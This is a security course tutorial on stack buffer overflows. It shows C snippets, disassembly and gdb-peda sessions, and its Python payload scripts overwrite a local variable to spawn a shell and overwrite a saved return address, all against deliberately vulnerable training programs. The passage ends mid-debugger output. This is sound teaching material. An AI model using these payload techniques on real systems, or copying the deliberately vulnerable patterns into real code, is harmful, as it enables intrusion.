====== 0x05. Buffer Exploitation ======

===== Resources =====

[[https://security.cs.pub.ro/summer-school/res/slides/06-buffer-management.pdf|Session 5 slides]]

[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-skel.zip|Session's tutorials and challenges archive]]

[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|Session's code snippets]].

/*[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-full.zip|Session's solutions]]*/

===== Tutorials =====

===== Buffers =====

A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes. In C, we can declare a buffer of bytes as a char array, as follows:

  char local_buffer[32];

Which results in the following assembly code:

  080483db <main>:
  80483db: 55 push ebp
  80483dc: 89 e5 mov ebp,esp
  80483de: 83 ec 20 sub esp,0x20
  80483e1: b8 00 00 00 00 mov eax,0x0
  80483e6: c9 leave
  80483e7: c3 ret

Notice that buffer allocation is done by simply subtracting its intended size from the current stack pointer (''sub esp, 0x20''). This only reserves space on the stack (remember that on x86 the stack grows "downwards", from higher addresses to lower ones).

A compiler may allocate more space on the stack than explicitly required. For example, on a 64-bit machine with stack canary enabled (an additional 64-bit value is implicitly placed between buffers and the return address - more on that in future sessions), declaring either ''char s[32]'' or ''char s[40]'' might yield ''sub rsp, 0x30'' to keep buffers aligned to 16-byte boundaries. To exploit a program, the C source code may not be a good enough reference point. Only disassembling the executable will provide relevant information.

Buffers can also be stored in other places in memory, such as the ''heap'', ''.data'', ''.bss'' or ''.rodata''.

You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffers/buffers.c'').

  #include <stdio.h>
  #include <stdlib.h>

  char g_buf_init_zero[32] = {0};
  /* g_buf_init_vals[5..31] will be 0 */
  char g_buf_init_vals[32] = {1, 2, 3, 4, 5};
  const char g_buf_const[32] = "Hello, world\n";

  int main(void)
  {
      char l_buf[32];
      static char s_l_buf[32];
      char *heap_buf = malloc(32);

      free(heap_buf);

      return 0;
  }

Let's have a look at the executable sections:

  $ readelf -S buffers
  [Nr] Name Type Addr Off Size ES Flg Lk Inf Al
  ...
  [16] .rodata PROGBITS 080485a0 0005a0 000040 00 A 0 0 32
  ...
  [24] .data PROGBITS 0804a020 001020 000040 00 WA 0 0 32
  [25] .bss NOBITS 0804a060 001060 000060 00 WA 0 0 32
  ...
  Key to Flags: W (write) A (alloc)

And the address of each symbol (buffer in this case):

  080485c0 R g_buf_const
  0804a040 D g_buf_init_vals
  0804a080 B g_buf_init_zero
  0804a0a0 b s_l_buf.2387

Key to Flags: R (symbol is read-only) D (symbol in initialized data section) B (symbol in BSS data section). Uppercase and lowercase flags refer to the same section; a lowercase flag means the symbol is local, i.e. not visible outside the module.

Alternatively, you can use gdb to extract information on each symbol:

  gdb-peda$ p &g_buf_const
  $1 = ( *) 0x80485c0

Using this information you can map each symbol to a data section. For example, the address of g_buf_const is ''0x80485c0'', so it is placed in the .rodata section (''addr=0x080485a0; size=0x40'').

Non-static local variables and dynamically allocated buffers cannot be seen in the executable (they have meaning only at runtime, because they are allocated on the stack or heap when the code reaches a certain point). Let's inspect the execution right before calling free() and see where the heap buffer is placed:

  gdb-peda$
  [----------------------------------registers-----------------------------------]
  EAX: 0x804b160 --> 0x0
  EBX: 0x0
  ECX: 0x21e79
  EDX: 0x804b160 --> 0x0
  ESI: 0xf7fb4000 --> 0x1d4d6c
  EDI: 0x0
  EBP: 0xffffd798 --> 0x0
  ESP: 0xffffd750 --> 0x804b160 --> 0x0
  EIP: 0x80484e8 (: call 0x8048350 )
  EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
  [-------------------------------------code-------------------------------------]
  0x80484df : mov DWORD PTR [ebp-0x30],eax
  0x80484e2 : sub esp,0xc
  0x80484e5 : push DWORD PTR [ebp-0x30]
  => 0x80484e8 : call 0x8048350
  0x80484ed : add esp,0x10
  0x80484f0 : mov eax,0x0
  0x80484f5 : mov edx,DWORD PTR [ebp-0xc]
  0x80484f8 : xor edx,DWORD PTR gs:0x14
  Guessed arguments:
  arg[0]: 0x804b160 --> 0x0
  [------------------------------------stack-------------------------------------]
  0000| 0xffffd750 --> 0x804b160 --> 0x0
  0004| 0xffffd754 --> 0xffffd9e0 ("examples/buffers")
  0008| 0xffffd758 --> 0xf7e0f049 (add ebx,0x1a4fb7)
  0012| 0xffffd75c --> 0xf7fb7748 --> 0x0
  0016| 0xffffd760 --> 0xf7fb4000 --> 0x1d4d6c
  0020| 0xffffd764 --> 0xf7fb4000 --> 0x1d4d6c
  0024| 0xffffd768 --> 0x804b160 --> 0x0
  0028| 0xffffd76c --> 0xf7e0f1ab (add esp,0x10)
  [------------------------------------------------------------------------------]
  Legend: code, data, rodata, value
  gdb-peda$ x/wx $ebp-0x30
  0xffffd768: 0x0804b160
  gdb-peda$ vmm
  Start End Perm Name
  ...
  0x0804b000 0x0806d000 rw-p [heap]
  ...

The gdb-peda ''vmm'' command displays the virtual memory map of the process; this can be used to easily inspect the addresses and permissions of each memory region.

You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''init_buffer/init_buffer.c''). Let's fill our stack buffer with some values and disassemble the binary:

  char local_buffer[32];
  unsigned int i = 0;

  for (i = 0; i < 32; i++) {
      local_buffer[i] = i;
  }

  080483db <main>:
  80483db: 55 push ebp
  80483dc: 89 e5 mov ebp,esp
  80483de: 83 ec 24 sub esp,0x24 ; reserve space for both the local_buffer (0x20) and i (0x4)
  80483e1: c7 45 fc 00 00 00 00 mov DWORD PTR [ebp-0x4],0x0 ; initialize i ('unsigned int i = 0')
  80483e8: c7 45 fc 00 00 00 00 mov DWORD PTR [ebp-0x4],0x0 ; 'i = 0' again, from the for statement (not optimized away)
  80483ef: eb 13 jmp 8048404 ; jump to the loop condition check
  80483f1: 8b 45 fc mov eax,DWORD PTR [ebp-0x4] ; get value of 'i' in eax
  80483f4: 89 c1 mov ecx,eax ; save 'i' in ecx
  80483f6: 8d 55 dc lea edx,[ebp-0x24] ; load the address of 'local_buffer' in edx
  80483f9: 8b 45 fc mov eax,DWORD PTR [ebp-0x4] ; get 'i'
  80483fc: 01 d0 add eax,edx ; compute address of 'local_buffer+i' in eax
  80483fe: 88 08 mov BYTE PTR [eax],cl ; store the low byte of 'i' at *(local_buffer+i)
  8048400: 83 45 fc 01 add DWORD PTR [ebp-0x4],0x1 ; increment 'i'
  8048404: 83 7d fc 1f cmp DWORD PTR [ebp-0x4],0x1f ; compare 'i' with 31
  8048408: 76 e7 jbe 80483f1 ; continue loop if below or equal, fall through if above
  804840a: b8 00 00 00 00 mov eax,0x0
  804840f: c9 leave
  8048410: c3 ret

Notice that now we subtract ''0x24'' from the stack pointer, since this time we also need to reserve space for the ''unsigned integer'' used as an index.

Local variables are referenced relative to ''ebp'', just like function arguments. Since in most cases the value of ''ebp'' stays fixed throughout the execution of a function, you can easily track local variables and buffers by mapping names to offsets (i.e. 'i' to '-0x4', 'local_buffer' to '-0x24' and so on). Intermediary positions within the buffer are almost always computed by using the base address and adding an offset to it.

Values at offsets relative to ''ebp'' have their meaning defined by their use, not by static names. This implies that even if the allocated space is 0x24, the compiler may reorder local buffers, and the space may be interpreted as either 'i' at 'ebp-0x4' and 'local_buffer' at 'ebp-0x24', or 'i' at 'ebp-0x24' and 'local_buffer' at 'ebp-0x20'.
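The mapping of names to ''ebp''-relative offsets can be replayed on a model of the stack frame. The following is a minimal sketch in Python 3 (an assumption; the payload scripts in this session are written for Python 2), using the offsets from the disassembly above (''local_buffer'' at ''ebp-0x24'', ''i'' at ''ebp-0x4''). The names ''frame_index'' and ''run_loop'' are hypothetical helpers, not part of the session's snippets.

```python
import struct

FRAME_SIZE = 0x24         # bytes reserved by 'sub esp,0x24'
OFF_LOCAL_BUFFER = -0x24  # local_buffer starts at ebp-0x24
OFF_I = -0x4              # i is stored at ebp-0x4


def frame_index(ebp_offset):
    """Translate a negative ebp-relative offset into an index in the model frame."""
    return FRAME_SIZE + ebp_offset


def run_loop(count):
    """Replay 'for (i = 0; i < count; i++) local_buffer[i] = i;' on a model frame."""
    frame = bytearray(FRAME_SIZE)            # frame[0] models the byte at ebp-0x24
    base = frame_index(OFF_LOCAL_BUFFER)
    i_pos = frame_index(OFF_I)
    struct.pack_into("<I", frame, i_pos, 0)  # mov DWORD PTR [ebp-0x4],0x0
    while True:
        i = struct.unpack_from("<I", frame, i_pos)[0]  # mov eax,[ebp-0x4]
        if i > count - 1:                    # cmp / jbe: leave the loop when above
            break
        frame[base + i] = i & 0xFF           # mov BYTE PTR [eax],cl
        struct.pack_into("<I", frame, i_pos, i + 1)    # add DWORD PTR [ebp-0x4],0x1
    return frame


if __name__ == "__main__":
    frame = run_loop(32)
    print(frame[:32].hex())
    print("i =", struct.unpack_from("<I", frame, frame_index(OFF_I))[0])
```

With a count of 32 the writes stop exactly at the byte before ''i'', so the index variable stays intact; the model only covers the layout shown in this particular disassembly.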
Finally, let's add one more interesting change to our code:

  char local_buffer2[30];
  char local_buffer[2];
  unsigned int i = 0;

  for (i = 0; i < 32; i++) {
      local_buffer[i] = i;
  }

Can you guess what the resulting code will look like when disassembled? Where are we writing to?

==== Stack buffer overflows ====

As we have seen in previous sessions, the stack serves multiple purposes:
  * Passing function arguments from the caller to the callee
  * Storing local variables for functions
  * Temporarily saving register values before a call
  * Saving the return address and old frame pointer

Our previous example clearly showcases the fact that even though, in an abstract sense, different buffers are separate from one another, ultimately they are just regions of memory which do not have any intrinsic identification or associated size. By contrast, some higher level languages make it impossible to write beyond the bounds of a container, because the size is integrated into the object itself. In our case, bounds are unchecked, so it is up to the programmer to code carefully. This includes checking for any overflows and using **safe functions**. Unfortunately, many functions in the standard C library, particularly those which work with strings and read user input, are unsafe - nowadays, the compiler will issue warnings when encountering them.

What can happen in the event that we write outside the bounds of a stack buffer?

You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow/buffer_overflow.c'').

  void f(char *buf)
  {
      unsigned int i = 0;

      for (i = 0; i < 100; i++) {
          buf[i] = i;
      }
  }

  int main(int argc, char* argv[])
  {
      char local_buffer[32];

      f(local_buffer);

      return 0;
  }

  $ ./buffer_overflow
  Segmentation fault (core dumped)

What happened?
Let's try to find the cause starting with the call of ''f'':

  gdb-peda$ b *0x08048430
  Breakpoint 1 at 0x8048430
  gdb-peda$ r
  [----------------------------------registers-----------------------------------]
  EAX: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
  EBX: 0x0
  ECX: 0x38f575fd
  EDX: 0xffffd684 --> 0x0
  ESI: 0xf7fb4000 --> 0x1d4d6c
  EDI: 0x0
  EBP: 0xffffd658 --> 0x0
  ESP: 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
  EIP: 0x8048430 (: call 0x80483f6 )
  EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
  [-------------------------------------code-------------------------------------]
  0x8048429 : sub esp,0x20
  0x804842c : lea eax,[ebp-0x20]
  0x804842f : push eax
  => 0x8048430 : call 0x80483f6
  0x8048435 : add esp,0x4
  0x8048438 : mov eax,0x0
  0x804843d : leave
  0x804843e : ret
  Guessed arguments:
  arg[0]: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
  arg[1]: 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
  [------------------------------------stack-------------------------------------]
  0000| 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
  0004| 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
  0008| 0xffffd63c --> 0x8048461 (<__libc_csu_init+33>: lea eax,[ebx-0xf4])
  0012| 0xffffd640 --> 0xf7fe59b0 (push ebp)
  0016| 0xffffd644 --> 0x0
  0020| 0xffffd648 --> 0x8048449 (<__libc_csu_init+9>: add ebx,0x1bb7)
  0024| 0xffffd64c --> 0x0
  0028| 0xffffd650 --> 0xf7fb4000 --> 0x1d4d6c
  [------------------------------------------------------------------------------]
  Legend: code, data, rodata, value
  Breakpoint 1, 0x08048430 in main ()
  gdb-peda$ ni
  [----------------------------------registers-----------------------------------]
  EAX: 0xffffd69b --> 0x63 ('c')
  EBX: 0x0
  ECX: 0x38f575fd
  EDX: 0x63 ('c')
  ESI: 0xf7fb4000 --> 0x1d4d6c
  EDI: 0x0
  EBP: 0xffffd658 (" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  ESP: 0xffffd634 --> 0xffffd638 --> 0x3020100
  EIP: 0x8048435 (: add esp,0x4)
  EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
  [-------------------------------------code-------------------------------------]
  0x804842c : lea eax,[ebp-0x20]
  0x804842f : push eax
  0x8048430 : call 0x80483f6
  => 0x8048435 : add esp,0x4
  0x8048438 : mov eax,0x0
  0x804843d : leave
  0x804843e : ret
  0x804843f: nop
  [------------------------------------stack-------------------------------------]
  0000| 0xffffd634 --> 0xffffd638 --> 0x3020100
  0004| 0xffffd638 --> 0x3020100
  0008| 0xffffd63c --> 0x7060504
  0012| 0xffffd640 --> 0xb0a0908
  0016| 0xffffd644 --> 0xf0e0d0c
  0020| 0xffffd648 --> 0x13121110
  0024| 0xffffd64c --> 0x17161514
  0028| 0xffffd650 --> 0x1b1a1918
  [------------------------------------------------------------------------------]
  Legend: code, data, rodata, value
  0x08048435 in main ()
  gdb-peda$ b *0x0804843e
  Breakpoint 2 at 0x0804843e
  gdb-peda$ c
  Continuing.
  [----------------------------------registers-----------------------------------]
  EAX: 0x0
  EBX: 0x0
  ECX: 0x38f575fd
  EDX: 0x63 ('c')
  ESI: 0xf7fb4000 --> 0x1d4d6c
  EDI: 0x0
  EBP: 0x23222120 (' !"#')
  ESP: 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  EIP: 0x804843e (: ret)
  EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
  [-------------------------------------code-------------------------------------]
  0x8048435 : add esp,0x4
  0x8048438 : mov eax,0x0
  0x804843d : leave
  => 0x804843e : ret
  0x804843f: nop
  0x8048440 <__libc_csu_init>: push ebp
  0x8048441 <__libc_csu_init+1>: push edi
  0x8048442 <__libc_csu_init+2>: push esi
  [------------------------------------stack-------------------------------------]
  0000| 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  0004| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  0008| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  0012| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  0016| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  0020| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  0024| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  0028| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  [------------------------------------------------------------------------------]
  Legend: code, data, rodata, value
  Breakpoint 2, 0x0804843e in main ()
  gdb-peda$ ni
  [----------------------------------registers-----------------------------------]
  EAX: 0x0
  EBX: 0x0
  ECX: 0x38f575fd
  EDX: 0x63 ('c')
  ESI: 0xf7fb4000 --> 0x1d4d6c
  EDI: 0x0
  EBP: 0x23222120 (' !"#')
  ESP: 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  EIP: 0x27262524 ("$%&'")
  EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
  [-------------------------------------code-------------------------------------]
  Invalid $PC address: 0x27262524
  [------------------------------------stack-------------------------------------]
  0000| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  0004| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  0008| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  0012| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  0016| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  0020| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  0024| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  0028| 0xffffd67c ("DEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
  [------------------------------------------------------------------------------]
  Legend: code, data, rodata, value
  0x27262524 in ?? ()

It seems that the return address of ''main'', along with a lot more of the stack, gets overwritten with the bytes that we write "in the buffer". The program then tries to "return to $%&'" ($%&' is the ASCII representation of the little-endian value 0x27262524), which is an unmapped address. This ultimately triggers a page fault, upon which the operating system sends the process a ''SIGSEGV'' and terminates it.

A buffer overflow is an anomaly caused by writing beyond the bounds of a buffer; it is not necessarily a vulnerability. The presence of a buffer overflow can lead to strange behavior, a crash, arbitrary code execution or absolutely **nothing**.

==== Diverting code execution ====

We attempted to use the wonderful ''gets'' function, but modern compilers reject or warn about it (it was removed from the C standard in C11), and the man page explicitly says:

  DESCRIPTION
  Never use this function.
  gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte ('\0'). No check for buffer overrun is performed (see BUGS below).

However, we can still handcraft our own vulnerable scenario. Let's try to divert the code execution by using a buffer overflow vulnerability.
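Before moving on, the values that ended up in ''ebp'' and ''eip'' during the crash in the previous section can be reproduced offline. This is a minimal sketch in Python 3 (an assumption; the session's own scripts target Python 2) that relies only on facts visible in the GDB session: ''f'' stores ''buf[i] = i'' for 100 bytes, and ''local_buffer'' starts at ''ebp-0x20'' in ''main''. The helper ''dword_at'' is a hypothetical name.

```python
import struct

# The 100 bytes written by f(): buf[i] = i for i in 0..99.
written = bytes(range(100))

BUF_TO_SAVED_EBP = 0x20            # local_buffer starts at ebp-0x20 in main
BUF_TO_RET = BUF_TO_SAVED_EBP + 4  # the return address sits right above the saved ebp


def dword_at(data, offset):
    """Read a 32-bit little-endian value, the way 'leave' and 'ret' read the stack."""
    return struct.unpack_from("<I", data, offset)[0]


saved_ebp = dword_at(written, BUF_TO_SAVED_EBP)
ret_addr = dword_at(written, BUF_TO_RET)

print(hex(saved_ebp))               # 0x23222120, the EBP value after 'leave'
print(hex(ret_addr))                # 0x27262524, the address 'ret' jumps to
print(written[BUF_TO_RET:BUF_TO_RET + 4])  # b"$%&'"
```

The two values match the ''EBP'' and ''EIP'' registers shown by PEDA, which confirms that the saved frame pointer and the return address sit 32 and 36 bytes past the start of the buffer in this build.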
You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow_var/buffer_overflow_var.c'').

  #include <stdio.h>
  #include <stdlib.h>

  void f(char* buf)
  {
      fgets(buf, 100, stdin);
  }

  int main(int argc, char* argv[])
  {
      int critical_variable = 0;
      char local_buffer[32];

      f(local_buffer);
      if (critical_variable == 1337) {
          printf("Oh dear, you shouldn't be here!\n");
          system("/bin/sh");
      }

      return 0;
  }

Our ''local_buffer'' is dangerously close to that critical variable. Let's see if we can overwrite it. We need 32 bytes of input to fill our buffer + 4 bytes for the integer.

  $ python -c "print 'A'*32 + '1337'" | ./buffer_overflow_var

Nothing happened. Let's find out why. We'll save our payload to a file and run ''buffer_overflow_var'' under gdb, using the file as input:

  $ python -c "print 'A'*32 + '1337'" > payload
  $ gdb ./buffer_overflow_var
  gdb-peda$ b *0x80484fc
  Breakpoint 1 at 0x80484fc
  gdb-peda$ r < payload
  Starting program: ./buffer_overflow_var < payload
  [----------------------------------registers-----------------------------------]
  EAX: 0xffffd5dc ('A' , "1337\n")
  EBX: 0x0
  ECX: 0xf7fb589c --> 0x0
  EDX: 0xffffd5dc ('A' , "1337\n")
  ESI: 0xf7fb4000 --> 0x1d4d6c
  EDI: 0x0
  EBP: 0xffffd608 --> 0x0
  ESP: 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c
  EIP: 0x80484fc (: cmp DWORD PTR [ebp-0xc],0x539)
  EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
  [-------------------------------------code-------------------------------------]
  0x80484f3 : push eax
  0x80484f4 : call 0x80484b6
  0x80484f9 : add esp,0x10
  => 0x80484fc : cmp DWORD PTR [ebp-0xc],0x539
  0x8048503 : jne 0x8048525
  0x8048505 : sub esp,0xc
  0x8048508 : push 0x80485c0
  0x804850d : call 0x8048360
  [------------------------------------stack-------------------------------------]
  0000| 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c
  0004| 0xffffd5d4 --> 0xf7fb4000 --> 0x1d4d6c
  0008| 0xffffd5d8 --> 0x0
  0012| 0xffffd5dc ('A' , "1337\n")
  0016| 0xffffd5e0 ('A' , "1337\n")
  0020| 0xffffd5e4 ('A' , "1337\n")
  0024| 0xffffd5e8 ('A' , "1337\n")
  0028| 0xffffd5ec ('A' , "1337\n")
  [------------------------------------------------------------------------------]
  Legend: code, data, rodata, value
  Breakpoint 1, 0x080484fc in main ()
  gdb-peda$ x/wx $ebp-0xc
  0xffffd5fc: 0x37333331
  gdb-peda$ x/s $ebp-0xc
  0xffffd5fc: "1337\n"

We usually use high level scripting languages, such as **python**, to craft payloads. For example, to generate 32 ''A''s, we just use '''A'*32''.

We can observe two things:
  * We actually wrote the __string__ ''1337'', which is ''0x37333331'', instead of the actual value ''1337'' or ''0x539'' in hex.
  * We missed the fact that x86 is Little Endian, meaning that we should write the integer value into memory starting with the least significant byte first.

An easy way to overcome this is to write a small script which will generate the required payload for us, as follows:

  #!/usr/bin/env python
  import struct

  buflen = 32
  payload = 'A' * buflen
  # 1337 as a 32-bit little-endian unsigned integer
  payload += struct.pack('<I', 1337)

  # save the payload so that it can be fed to the binary
  with open('payload', 'wb') as f:
      f.write(payload)

Note the use of ''struct.pack'' and ''struct.unpack'' when working with binary data that needs to be laid out with a specific size and byte order.

Let's test our new payload:

  $ cat payload | ./buffer_overflow_var
  Oh dear, you shouldn't be here!

It seems to alter the code flow as we wanted to, but it doesn't seem to spawn a (new) shell. What gives? The gist of the issue is that the binary's ''stdin'' is the pipe fed by ''cat'', which reaches end of input as soon as the payload has been sent. Our newly spawned shell inherits that ''stdin'', has no input to read, and exits before we get a chance to input any commands (similar to how the shell behaves when you press ''Ctrl-D'', i.e. ''end of input''). We can use the following clever trick to keep ''stdin'' open for further user interaction:

  $ cat payload - | ./buffer_overflow_var
  Oh dear, you shouldn't be here!
  date
  Tue Jun 27 22:17:48 EEST 2017
  whoami
  root

We used the ''cat filename - | ./binary'' trick to concatenate the contents of ''filename'' with the ''standard input''.
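Going back to the two observations about the first payload, a short check makes the difference between the string ''1337'' and the integer ''1337'' concrete. This is a minimal sketch in Python 3 (an assumption; the scripts in this session are written for Python 2), and the variable names are chosen only for illustration.

```python
import struct

ascii_digits = b"1337"                   # what the first payload appended after the 32 'A's
packed_value = struct.pack("<I", 1337)   # the integer 1337 as 4 little-endian bytes

# How 'cmp DWORD PTR [ebp-0xc],0x539' interprets the four ASCII characters.
as_seen_by_cmp = struct.unpack("<I", ascii_digits)[0]

payload = b"A" * 32 + packed_value       # 32 bytes of filler, then the integer

print(hex(as_seen_by_cmp))               # 0x37333331
print(packed_value.hex())                # 39050000
print(struct.unpack_from("<I", payload, 32)[0])  # 1337
```

The first value is exactly what ''x/wx $ebp-0xc'' displayed in GDB, while the packed form places ''0x39'' first and ''0x05'' second, as required on a little-endian machine.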
With ''cat payload -'', once the end of the payload file is reached, ''cat'' goes on to forward whatever arrives on its own standard input, so you can continue feeding data to the binary.

==== Overwriting the stored return address ====

Let's wrap up our stack smashing adventure by changing the code flow through overwriting the return address stored on the stack.

You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow_ret/buffer_overflow_ret.c'').

  #include <stdio.h>

  void win()
  {
      printf("Well done!\n");
  }

  void f()
  {
      printf("Nothing to see here\n");
  }

  void get_message(char *buf)
  {
      fgets(buf, 100, stdin);
  }

  int main(int argc, char* argv[])
  {
      char local_buffer[32];

      printf("Please leave a message: ");
      get_message(local_buffer);
      f();

      return 0;
  }

First, let's trigger the program to crash like in the previous example:

  $ ./buffer_overflow_ret
  Please leave a message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  Nothing to see here
  Segmentation fault (core dumped)

However, we do not know at which point relative to the start of our buffer the saved return address gets overwritten. We can either compute it by looking at the disassembly and the stack layout or by using a De Bruijn pattern in PEDA. Such a pattern contains unique groups of 4 characters, meaning that each group has a unique offset within the pattern.

  $ gdb ./buffer_overflow_ret
  gdb-peda$ pattc 100
  'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
  gdb-peda$ r
  Starting program: ./buffer_overflow_ret
  Please leave a message: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALL
  Nothing to see here
  Program received signal SIGSEGV, Segmentation fault.
  [----------------------------------registers-----------------------------------]
  EAX: 0x0
  EBX: 0x0
  ECX: 0x804b160 ("Nothing to see here\nge: ")
  EDX: 0xf7fb5890 --> 0x0
  ESI: 0xf7fb4000 --> 0x1d4d6c
  EDI: 0x0
  EBP: 0x61414145 ('EAAa')
  ESP: 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
  EIP: 0x41304141 ('AA0A')
  EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
  [-------------------------------------code-------------------------------------]
  Invalid $PC address: 0x41304141
  [------------------------------------stack-------------------------------------]
  0000| 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
  0004| 0xffffd624 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
  0008| 0xffffd628 ("AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
  0012| 0xffffd62c ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
  0016| 0xffffd630 ("2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
  0020| 0xffffd634 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
  0024| 0xffffd638 ("A3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA")
  0028| 0xffffd63c ("IAAeAA4AAJAAfAA5AAKAAgAA6AA")
  [------------------------------------------------------------------------------]
  Legend: code, data, rodata, value
  Stopped reason: SIGSEGV
  0x41304141 in ?? ()
  gdb-peda$ patto AA0A
  AA0A found at offset: 40

This tells us that we need to write 40 characters into the buffer and then the next 4 bytes will overwrite the return address. Let's test this, again, by writing a script that can generate a payload, which we can easily tailor to our needs. First, let's see if we can reliably change the value of the return address. We'll attempt to write ''0xdeadbeef'' first.

  #!/usr/bin/env python
  import struct

  payload = 'A' * 36
  # bytes 36..39 land in the saved ebp ('aaaa' in the run below)
  payload += 'a' * 4
  # bytes 40..43 land in the saved return address
  payload += struct.pack('<I', 0xdeadbeef)

  # save the payload so that it can be fed to the binary
  with open('payload', 'wb') as f:
      f.write(payload)

  gdb-peda$ r < payload
  Starting program: ./buffer_overflow_ret < payload
  Please leave a message: Nothing to see here
  Program received signal SIGSEGV, Segmentation fault.
  [----------------------------------registers-----------------------------------]
  EAX: 0x0
  EBX: 0x0
  ECX: 0x804b160 ("Please leave a message: Nothing to see here\n")
  EDX: 0xf7fb5890 --> 0x0
  ESI: 0xf7fb4000 --> 0x1d4d6c
  EDI: 0x0
  EBP: 0x61616161 ('aaaa')
  ESP: 0xffffd620 --> 0x0
  EIP: 0xdeadbeef
  EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
  [-------------------------------------code-------------------------------------]
  Invalid $PC address: 0xdeadbeef
  [------------------------------------stack-------------------------------------]
  0000| 0xffffd620 --> 0x0
  0004| 0xffffd624 --> 0xffffd6b4 --> 0xffffd859 ("./buffer_overflow_ret")
